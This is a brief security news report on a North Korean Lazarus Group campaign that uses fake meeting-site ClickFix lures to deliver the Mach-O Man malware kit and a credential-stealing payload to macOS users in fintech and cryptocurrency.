New Mach-O Man malware tapped by Lazarus in macOS-targeted ClickFix attacks

High-level fintech and cryptocurrency individuals, including executives and developers, have had their macOS environments targeted by the North Korean hacking collectiveLazarus Groupwith the new Mach-O Man malware kit in a new ClickFix campaign, reportsGBHackers News.Attacks commenced with the delivery of urgent meeting invites purportedly from business contacts or colleagues that include links diverting to fake Microsoft Teams, Zoom, or Google Meet websites that display a connection issue, which requires command execution in Terminal to be resolved, according to an analysis by BCA LTD founder Mauro Eldritch. Running the command launches the initial staging binary that retrieves bogus macOS apps that seek to obtain targets’ credentials, while a secondary module facilitates system profiling to obtain OS details, host identifiers, network configuration data, and browser extension information, before the eventual injection of the macrasv2 stealer.Aside from stealing browser-stored credentials and cookies, such a stealer also exfiltrates Keychain secrets and other files that would allow software-as-a-service platform breaches. While the Mach-O Man kit is poorly written, organizations’ network defenders have still been urged to reinforce defenses against ClickFix-style lures.